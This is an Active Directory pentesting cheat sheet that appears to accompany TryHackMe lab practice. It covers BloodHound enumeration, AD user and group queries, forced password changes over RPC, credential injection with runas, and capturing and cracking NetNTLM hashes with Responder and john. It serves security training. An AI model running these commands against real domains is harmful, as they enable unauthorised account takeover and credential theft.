Active Directory Pentesting

Active Directory (AD) is a directory service developed by Microsoft for Windows domain networks.

- [adenumeration](https://tryhackme.com/room/adenumeration)

Enumeration

Domain Controllers Discovery

dig @<target-ip> example.local ANY
gobuster dns -d example.local -w subdomains.txt -t 25


Enumeration with BloodHound

1. Run BloodHound

We use BloodHound Community Edition.
The following command starts the Docker Compose of the BloodHound.

curl -L https://ghst.ly/getbhce | docker compose -f - up

After that, we can use the web UI by accessing to localhost:8080 in web browser.
Login with the username admin and the password which is displayed the log when executing the above command.

To specify arbitrary ip and port, set the environment variables on our attack machine:

export BLOODHOUND_HOST=10.0.0.1
export BLOODHOUND_PORT=8090

2. Collect Data with BloodHound.py

Here we use BloodHound.py.
Install it as follow:

python3 -m venv venv
source venv/bin/activate
pip3 install bloodhound
bloodhound-python -h

Then

# -d: Domain
# -u: Username
# -p: Password
# -dc: Domain Controller
# -c all: Collect all data
# -ns: Alternate the nameserver
bloodhound-python -d example.local -u 'TABATHA_BRITT' -p 'marlboro(1985)' -dc dc.example.local -c all -ns ns.example.local

# If we cannot resolve the domain, try dnschef (https://github.com/iphelix/dnschef) to create a fake DNS by proxy.
sudo python3 dnschef.py --fakeip <target-ip> --nameserver <target-ip>

3. Upload Collected Data

After running, the result files (*.json) generated in the current directory. Upload all these JSON files to the BloodHound in web browser.

We can explore the relationship in the Active Directory.


Investigation

# List all users
net user /domain
net user <username> /domain
Get-ADUser -Filter *
Get-ADUser -Identity <username> -Server dc.example.com -Properties *
Get-ADUser -Filter 'Name -like "*michael"' -Server dc.example.com | Format-Table Name,SamAccountName -A

# List all groups
net group /domain
net group "<group>" /domain
PS> Get-ADGroup -Identity <group> -Server dc.example.com -Properties *
PS> Get-ADGroupMember -Identity <group> -Server dc.example.com

# List the password policy
net accounts /domain

# List AD objects
$ChangeDate = New-Object DateTime(2022, 02, 28, 12, 00, 00)
Get-ADObject -Filter 'whenChanged -gt $ChangeDate' -includeDeletedObjects -Server dc.example.com

# Retrieve information about the given domain.
Get-ADDomain -Server dc.example.com

# Change the password of AD user
Set-ADAccountPassword -Identity <username> -Server dc.example.com  -OldPassword (ConvertTo-SecureString -AsPlaintext "oldpass" -force) -NewPassword (ConvertTo-SecureString -AsPlaintext "newpass" -force)

# SYSVOL - A shared folder storing the Group Policy Objects (GPOs).
dir \\dc.example.com\SYSVOL\


Force Change Password Attack

If we found some username/password, and other usernames, we might be able to change other user passwords. The user needs to have GenericAll permission to change passwords of other users.

# -U: User credential who has the permission to change another user password
# -I: Target IP
# -S: Target server name
net rpc password "TargetUserName" "myPassw0rd@123" -U "UserName"%"Password" -I "10.0.0.1" -S "EXAMPLE.LOCAL"


Microsoft Management Console (mmc)

To setup AD, follow this instructions:

  1. Right-click on the Windows icon.
  2. Click "Run" and enter "mmc" then click "OK".
  3. In the MMC, click "File → Add or Remove Snap-ins".
  4. Add all three "Active Directory…" snap-ins.
  5. Right-click on the "Active Directory…" in the left pane and select "Change Forest".
  6. Enter the domain as the Root domain and click OK.
  7. Click on "View → Advanced Features".


Naming Convention

If we found usernames list in Active Directory, we can modify usernames with naming convention.
For instance,

john smith   -> jsmith, j.smith
michael pole -> mpole, m.pole


SSH Login with AD Credentials

ssh dc.example.com\\<ad_username>@sub.dc.example.com


Inject Credentials into Memory

# /netonly: All network communications will use these injected credentials for authentication.
runas.exe /netonly /user:<domain>\<username> cmd.exe


DNS Configuration

# PowerShell
$dnsip = "<DC_IP>"
$index = Get-NetAdapter -Name 'Ethernet' | Select-Object -ExpandProperty 'ifIndex'
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip

Now check if the configuration is set correctly.

nslookup dc.example.com


Basic Knowledge

User Management


Intercept NetNTLM Authentication

Start Responder to listen for any LLMNR, NBT-NS, WPAD requests.

sudo responder -I <interface-like-eth0>

Leave Responder running until receiving some requests.
If you get NTLM hash, crack it in local machine.

echo -n '<copied-NTLM-hash>' > hash.txt
john --format=netntlmv2 --wordlist=wordlist.txt hash.txt